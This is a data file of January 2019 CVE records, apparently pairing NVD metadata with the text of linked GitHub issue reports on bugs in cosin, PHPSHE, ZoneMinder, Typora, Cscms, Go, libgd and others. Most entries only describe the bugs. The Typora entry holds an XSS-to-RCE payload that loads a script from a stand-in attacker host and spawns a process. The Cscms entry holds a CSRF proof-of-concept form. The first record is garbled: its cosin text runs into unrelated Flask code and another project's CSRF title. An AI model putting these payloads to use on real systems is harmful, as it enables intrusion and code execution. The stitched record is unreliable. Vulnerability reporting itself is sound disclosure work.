CVE-2019-6503 | 2019-01-22T14:29:00.563 | There is a deserialization vulnerability in Chatopera cosin v3.10.0. An attacker can execute commands during server-side deserialization by uploading maliciously constructed files. This is related to the TemplateController.java impsave method and the MainUtils toObject method. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chatopera/cosin/issues/177"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Pa... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chatopera:cosin:3.10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DC72B1B6-A924-47B8-84B3-663E7B700885",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | [
"502"
] | 502 | https://github.com/chatopera/cosin/issues/177 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chatopera",
"cosin"
] | # 描述
您好,我是360代码卫士的工资人员,在我们的开源项目代码检测过程中,发现cosin中存在java反序列化漏洞,详细信息如下:
## 现在行为
在TemplateController.java文件的impsave方法中,85行处读取上传文件字节码,并调用了MainUtils工具类中的toObject方法

跟进该方法中,发现直接对文件内容进行反序列化操作

@permission_required('admin.login_user_delete')
def login_user_delete(id):
lg_user_del = LoginUser.query.get_or_404(id)
db.session.delete(lg_use... | There are four CSRF vulnerability that can delete user and etc | https://api.github.com/repos/creditease-sec/insight/issues/42/comments | 1 | 2019-01-22T13:59:31Z | 2019-02-15T03:15:12Z | https://github.com/creditease-sec/insight/issues/42 | 401,777,236 | 42 | 57 |
CVE-2019-6707 | 2019-01-23T19:29:01.023 | PHPSHE 1.7 has SQL injection via the admin.php?mod=product&act=state product_id[] parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/kk98kk0/exploit/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:phpshe:phpshe:1.7:*:*:*:*:*:*:*",
"matchCriteriaId": "5B418BD6-2C7D-440C-9BB0-6616569BA3B7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | [
"89"
] | 89 | https://github.com/kk98kk0/exploit/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"kk98kk0",
"exploit"
] | **1.Vulnerability describes**
**Detection object:**
(1) website name: PHPSHE CMS system V1.7
(2) website domain name: http://www.phpshe.com/
(3) the IP address: http://www.phpshe.com/down/phpshe1.7.rar
(4) version: PHPSHE B2C system v1.7 (build 20180905 UTF8)
**Detection time:**
January 3, 2019
... | PHPSHE1.7 admin.php SqlInjection Vulnerability | https://api.github.com/repos/kk98kk0/exploit/issues/1/comments | 0 | 2019-01-03T12:49:43Z | 2019-01-06T12:27:29Z | https://github.com/kk98kk0/exploit/issues/1 | 395,561,857 | 1 | 58 |
CVE-2019-6708 | 2019-01-23T19:29:01.523 | PHPSHE 1.7 has SQL injection via the admin.php?mod=order state parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/kk98kk0/exploit/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:phpshe:phpshe:1.7:*:*:*:*:*:*:*",
"matchCriteriaId": "5B418BD6-2C7D-440C-9BB0-6616569BA3B7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | [
"89"
] | 89 | https://github.com/kk98kk0/exploit/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"kk98kk0",
"exploit"
] | **Vulnerability description**
Test object:
(1) website: PHPSHE shopping system V1.7
(2) the website domain name: http://www.phpshe.com/
(3) IP address: http://www.phpshe.com/down/phpshe1.7.rar
(4) version: PHPSHE B2C mall system v1.7 (build 20180905 UTF8)
Detection time:
January 6, 2019
**Vulnerab... | PHPSHE1.7 admin.php SqlInjection Vulnerability -2 | https://api.github.com/repos/kk98kk0/exploit/issues/2/comments | 0 | 2019-01-06T12:51:46Z | 2019-01-06T12:51:46Z | https://github.com/kk98kk0/exploit/issues/2 | 396,255,557 | 2 | 59 |
CVE-2019-6719 | 2019-01-23T22:29:00.557 | An issue has been found in libIEC61850 v1.3.1. There is a use-after-free in the getState function in mms/iso_server/iso_server.c, as demonstrated by examples/server_example_goose/server_example_goose.c and examples/server_example_61400_25/server_example_61400_25.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/mz-automation/libiec61850/issues/111"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mz-automation:libiec61850:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A3197989-9E64-49DA-875C-7EF8A7697B1B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"416"
] | 416 | https://github.com/mz-automation/libiec61850/issues/111 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"mz-automation",
"libiec61850"
] | Hi Team,
There is Heap Use After Free in server_example_goose and server_example_61400_25
Snip
[server_example_goose.c](https://github.com/mz-automation/libiec61850/blob/v1.3/examples/server_example_goose/server_example_goose.c)
[server_example_61400_25.c](https://github.com/mz-automation/libiec61850/blob/v1.3/exam... | Heap Use After Free in server_example_goose and server_example_61400_25 | https://api.github.com/repos/mz-automation/libiec61850/issues/111/comments | 2 | 2019-01-15T11:05:33Z | 2019-03-25T22:01:16Z | https://github.com/mz-automation/libiec61850/issues/111 | 399,294,594 | 111 | 60 |
CVE-2018-20742 | 2019-01-24T05:29:00.753 | An issue was discovered in UC Berkeley RISE Opaque before 2018-12-01. There is no boundary check on ocall_malloc. The return value could be a pointer to enclave memory. It could cause an arbitrary enclave memory write. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ucbrise/opaque/commit/5ddda15d89f5ac82f4416208c5319ace4aecdc36"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ucbrise:opaque:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3FFA46CC-CA6A-43D8-841A-2C7B17F7FCE6",
"versionEndExcluding": "2018-12-01",
"versionEndIncluding": null,
"versionStartExc... | [
"787"
] | 787 | https://github.com/ucbrise/opaque/issues/66 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"ucbrise",
"opaque"
] | ```cpp
// EDL
void ocall_malloc(size_t size, [out] uint8_t **ret);
// Implementation
void ocall_malloc(size_t size, uint8_t **ret) {
*ret = static_cast<uint8_t *>(malloc(size));
}
```
`uint8_t **ret` could be a pointer to memory in enclave. It could casue a arbitrary memory write in enclave.
Fix:
... | Security: No boundary check on `ocall_malloc` | https://api.github.com/repos/mc2-project/opaque-sql/issues/66/comments | 1 | 2018-12-01T08:19:39Z | 2018-12-01T09:11:22Z | https://github.com/mc2-project/opaque-sql/issues/66 | 386,436,771 | 66 | 61 |
CVE-2019-6486 | 2019-01-24T05:29:00.907 | Go before 1.10.8 and 1.11.x before 1.11.5 mishandles P-521 and P-384 elliptic curves, which allows attackers to cause a denial of service (CPU consumption) or possibly conduct ECDH private key recovery attacks. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00042.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00060.html"... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DC7FF63E-50BB-42D5-ACD6-1F5A9AD7E08D",
"versionEndExcluding": "1.10.8",
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"770"
] | 770 | https://github.com/golang/go/issues/29903 | [
"Third Party Advisory"
] | github.com | [
"golang",
"go"
] | A DoS vulnerability in the crypto/elliptic implementations of the P-521 and P-384 elliptic curves may let an attacker craft inputs that consume excessive amounts of CPU.
These inputs might be delivered via TLS handshakes, X.509 certificates, JWT tokens, ECDH shares or ECDSA signatures. In some cases, if an ECDH priv... | crypto/elliptic: CPU DoS vulnerability affecting P-521 and P-384 | https://api.github.com/repos/golang/go/issues/29903/comments | 8 | 2019-01-23T21:47:29Z | 2020-03-13T20:17:47Z | https://github.com/golang/go/issues/29903 | 402,444,291 | 29,903 | 62 |
CVE-2019-6777 | 2019-01-24T15:29:01.017 | An issue was discovered in ZoneMinder v1.32.3. Reflected XSS exists in web/skins/classic/views/plugin.php via the zm/index.php?view=plugin pl parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2436"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:1.32.3:*:*:*:*:*:*:*",
"matchCriteriaId": "E5A2481D-4A45-48A2-B7DE-86C7D161F6EA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStar... | [
"79"
] | 79 | https://github.com/ZoneMinder/zoneminder/issues/2436 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
-ZoneMinder v1.32.3
**Describe the bug**
Reflective XSS vulnerability
**To Reproduce**
ZoneMinder has one reflective XSS vulnerabilities
1.plugin.php line 106
The parameters in the request are accepted at 39 lines, and the page is output at 106 lines without verification.
![... | Reflective XSS vulnerability | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2436/comments | 3 | 2019-01-23T08:03:50Z | 2019-01-24T20:23:21Z | https://github.com/ZoneMinder/zoneminder/issues/2436 | 402,115,314 | 2,436 | 63 |
CVE-2019-6779 | 2019-01-24T19:29:00.197 | Cscms 4.1.8 allows admin.php/links/save CSRF to add, modify, or delete friend links. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms:4.1.8:*:*:*:*:*:*:*",
"matchCriteriaId": "A70E830D-724F-4B4C-A709-0DAAD326DC70",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"352"
] | 352 | https://github.com/chshcms/cscms/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | just use add friend links for example:
After the admin logged in, we can send him a url with these code on that page
PoC:
```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:9000/admin.php/links/save" method="POST">
<input type="hidden" name="... | There is a CSRF vulnerability that can add/modify/delete friend links | https://api.github.com/repos/chshcms/cscms/issues/3/comments | 0 | 2019-01-24T14:51:59Z | 2020-02-27T04:22:34Z | https://github.com/chshcms/cscms/issues/3 | 402,743,077 | 3 | 64 |
CVE-2019-6803 | 2019-01-25T05:29:00.903 | typora through 0.9.9.20.3 beta has XSS, with resultant remote command execution, via the left outline bar. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/typora/typora-issues/issues/2124"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:typora:typora:0.8.1:alpha:*:*:*:*:*:*",
"matchCriteriaId": "AC70FD56-1852-49ED-A76B-B7D3838D7F58",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | [
"79"
] | 79 | https://github.com/typora/typora-issues/issues/2124 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"typora",
"typora-issues"
] | The filtering rules on the left outline bar are not perfect. It will cause XSS,when the document has the following content, and then could raise to RCE:
eg:
```markdown
# 1
# \<script src=https://hacker_s_url/xss.js\>\</script\>
```
```js
//xss.js 's content
var Process = process.binding('process_wrap').Pro... | Typora XSS to RCE | https://api.github.com/repos/typora/typora-issues/issues/2124/comments | 1 | 2019-01-24T14:38:57Z | 2019-01-25T13:47:37Z | https://github.com/typora/typora-issues/issues/2124 | 402,736,969 | 2,124 | 66 |
CVE-2019-6804 | 2019-01-25T05:29:00.950 | An XSS issue was discovered on the Job Edit page in Rundeck Community Edition before 3.0.13, related to assets/javascripts/workflowStepEditorKO.js and views/execution/_wfitemEdit.gsp. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://docs.rundeck.com/docs/history/version-3.0.13.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rundeck/rundeck/issues/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pagerduty:rundeck:*:*:*:*:community:*:*:*",
"matchCriteriaId": "A788E9B1-4D67-4481-A11C-9BE9E2D519F0",
"versionEndExcluding": "3.0.13",
"versionEndIncluding": null,
"versionS... | [
"79"
] | 79 | https://github.com/rundeck/rundeck/issues/4406 | [
"Third Party Advisory"
] | github.com | [
"rundeck",
"rundeck"
] | **Describe the bug**
A stored XSS vulnerability exists in the Job Edit page
**My Rundeck detail**
* Rundeck version: 2.11, 3.0
* install type: any
**To Reproduce**
(forthcoming)
| Security: stored XSS vulnerability | https://api.github.com/repos/rundeck/rundeck/issues/4406/comments | 0 | 2019-01-22T21:38:39Z | 2019-01-22T23:41:33Z | https://github.com/rundeck/rundeck/issues/4406 | 401,965,300 | 4,406 | 67 |
CVE-2018-20743 | 2019-01-25T16:29:00.260 | murmur in Mumble through 1.2.19 before 2018-08-31 mishandles multiple concurrent requests that are persisted in the database, which allows remote attackers to cause a denial of service (daemon hang or crash) via a message flood. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00045.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00023.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mumble:mumble:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2AF7520D-3D90-45C5-8115-D2D047A96165",
"versionEndExcluding": null,
"versionEndIncluding": "1.2.19",
"versionStartExcludin... | [
"20"
] | 20 | https://github.com/mumble-voip/mumble/issues/3505 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"mumble-voip",
"mumble"
] | Rate limiting | https://api.github.com/repos/mumble-voip/mumble/issues/3505/comments | 6 | 2018-08-27T15:48:38Z | 2019-04-02T18:39:46Z | https://github.com/mumble-voip/mumble/issues/3505 | 354,373,433 | 3,505 | 68 | |
CVE-2019-6966 | 2019-01-25T23:29:00.237 | An issue was discovered in Bento4 1.5.1-628. The AP4_ElstAtom class in Core/Ap4ElstAtom.cpp has an attempted excessive memory allocation related to AP4_Array<AP4_ElstEntry>::EnsureCapacity in Core/Ap4Array.h, as demonstrated by mp42hls. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/361"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*",
"matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"770"
] | 770 | https://github.com/axiomatic-systems/Bento4/issues/361 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | A crafted input will lead to failed allocate LargeMmapAllocator in Ap4Array.h at Bento4 1.5.1-628.
Triggered by
./mp42hls crash3.mp4
Poc
[poc1.zip](https://github.com/axiomatic-systems/Bento4/files/2795098/poc1.zip)
Bento4 Version 1.5.1-628
The ASAN information is as follows:
```
==56305==ERROR: Add... | failed to allocate LargeMmapAllocator in Ap4Array.h at Bento4 v1.5.1-628 when running mp42hls | https://api.github.com/repos/axiomatic-systems/Bento4/issues/361/comments | 1 | 2019-01-25T07:49:22Z | 2019-12-26T14:50:59Z | https://github.com/axiomatic-systems/Bento4/issues/361 | 403,042,062 | 361 | 69 |
CVE-2018-20744 | 2019-01-28T08:29:00.230 | The Olivier Poitrey Go CORS handler through 1.3.0 actively converts a wildcard CORS policy into reflecting an arbitrary Origin header value, which is incompatible with the CORS security design, and could lead to CORS misconfiguration security problems. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://www.securityfocus.com/bid/106834"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/rs/cors/issues/55"
},
{
"so... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:go_cors_project:go_cors:*:*:*:*:*:*:*:*",
"matchCriteriaId": "83CDD84E-E81F-4256-B707-55259AD874F6",
"versionEndExcluding": null,
"versionEndIncluding": "1.3.0",
"versionStar... | [
"346"
] | 346 | https://github.com/rs/cors/issues/55 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"rs",
"cors"
] | When CORS policy is configured to origin:"*", current go CORS handler will actively convert it to reflect any Origin header value. This kind of behavior is dangerous and has caused many security problems in the past.
Some similar security issues:
https://github.com/cyu/rack-cors/issues/126
https://nodesecurity.io/... | CORS security: reflecting any origin header value when configured to * is dangerous | https://api.github.com/repos/rs/cors/issues/55/comments | 6 | 2018-05-12T08:14:21Z | 2018-05-24T05:45:51Z | https://github.com/rs/cors/issues/55 | 322,492,987 | 55 | 70 |
CVE-2018-20745 | 2019-01-28T08:29:00.527 | Yii 2.x through 2.0.15.1 actively converts a wildcard CORS policy into reflecting an arbitrary Origin header value, which is incompatible with the CORS security design, and could lead to CORS misconfiguration security problems. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yiisoft/yii2/issues/16193"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.usenix.org/system/files/conference/us... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E86F5F96-5AF7-484F-BCD3-3EE7F73C4CB4",
"versionEndExcluding": null,
"versionEndIncluding": "2.0.15.1",
"versionStartExc... | [
"346"
] | 346 | https://github.com/yiisoft/yii2/issues/16193 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yiisoft",
"yii2"
] | When CORS policy is configured to *, current Yii2 CORS filter will actively convert it to reflect any Origin header value. This kind of behavior is dangerous and has caused many security problems in the past.
Some similar security issues:
[https://github.com/cyu/rack-cors/issues/126](https://github.com/cyu/rack-cor... | CORS security: reflecting any origin header value when configured to * is dangerous | https://api.github.com/repos/yiisoft/yii2/issues/16193/comments | 4 | 2018-04-29T14:01:17Z | 2018-05-01T08:02:43Z | https://github.com/yiisoft/yii2/issues/16193 | 318,719,387 | 16,193 | 71 |
CVE-2019-6978 | 2019-01-28T08:29:00.607 | The GD Graphics Library (aka LibGD) 2.2.5 has a double free in the gdImage*Ptr() functions in gd_gif_out.c, gd_jpeg.c, and gd_wbmp.c. NOTE: PHP is unaffected. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00025.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00031.html"
},
{
"source": "cve@mit... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libgd:libgd:2.2.5:*:*:*:*:*:*:*",
"matchCriteriaId": "C257CC1C-BF6A-4125-AA61-9C2D09096084",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | [
"415"
] | 415 | https://github.com/libgd/libgd/issues/492 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"libgd",
"libgd"
] | Hi, please commit the patch file. | Update gdImage*Ptr() functions for possible Double free bugs | https://api.github.com/repos/libgd/libgd/issues/492/comments | 9 | 2019-01-15T11:09:33Z | 2019-07-09T03:48:08Z | https://github.com/libgd/libgd/issues/492 | 399,296,066 | 492 | 72 |
CVE-2019-6988 | 2019-01-28T16:29:00.213 | An issue was discovered in OpenJPEG 2.3.0. It allows remote attackers to cause a denial of service (attempted excessive memory allocation) in opj_calloc in openjp2/opj_malloc.c, when called from opj_tcd_init_tile in openjp2/tcd.c, as demonstrated by the 64-bit opj_decompress. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://www.securityfocus.com/bid/106785"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/uclouvain/openjpeg/issues/1178"
},
{
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:uclouvain:openjpeg:2.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "459BFDFA-A27B-4C47-A966-9E99E022BD04",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"770"
] | 770 | https://github.com/uclouvain/openjpeg/issues/1178 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"uclouvain",
"openjpeg"
] | I found a problem which will cause memory is exhausted, and program hang for 8 minutes. My test server had 112GB of memory. This can cause denial of service.
### Steps to Reproduce
1. Download and unzip [POC.zip]
[POC.zip](https://github.com/uclouvain/openjpeg/files/2769058/POC.zip)
2. Run `opj_decompress -i POC... | memory exhauted and hangs long time when use 64bit opj_decompress (CVE-2019-6988) | https://api.github.com/repos/uclouvain/openjpeg/issues/1178/comments | 15 | 2019-01-17T14:49:50Z | 2023-11-02T02:39:27Z | https://github.com/uclouvain/openjpeg/issues/1178 | 400,311,428 | 1,178 | 73 |
CVE-2019-6990 | 2019-01-28T20:29:00.310 | A stored-self XSS exists in web/skins/classic/views/zones.php of ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code in a vulnerable field via a crafted Zone NAME to the index.php?view=zones&action=zoneImage&mid=1 URI. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/a3e8fd4fd5b579865f35aac3b964bc78d5b7a94a"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Ad... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStart... | [
"79"
] | 79 | https://github.com/ZoneMinder/zoneminder/issues/2444 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
In the view `zone`, an user can add/view/delete zones. While adding a zone, there exists no input filtration, allowing an attacker to inject unintended values. Later while displaying the zon... | Stored Self-Cross Site Scripting (XSS) - zones.php | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2444/comments | 0 | 2019-01-24T18:48:25Z | 2019-01-25T13:15:12Z | https://github.com/ZoneMinder/zoneminder/issues/2444 | 402,845,981 | 2,444 | 74 |
CVE-2019-6991 | 2019-01-28T20:29:00.373 | A classic Stack-based buffer overflow exists in the zmLoadUser() function in zm_user.cpp of the zmu binary in ZoneMinder through 1.32.3, allowing an unauthenticated attacker to execute code via a long username. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
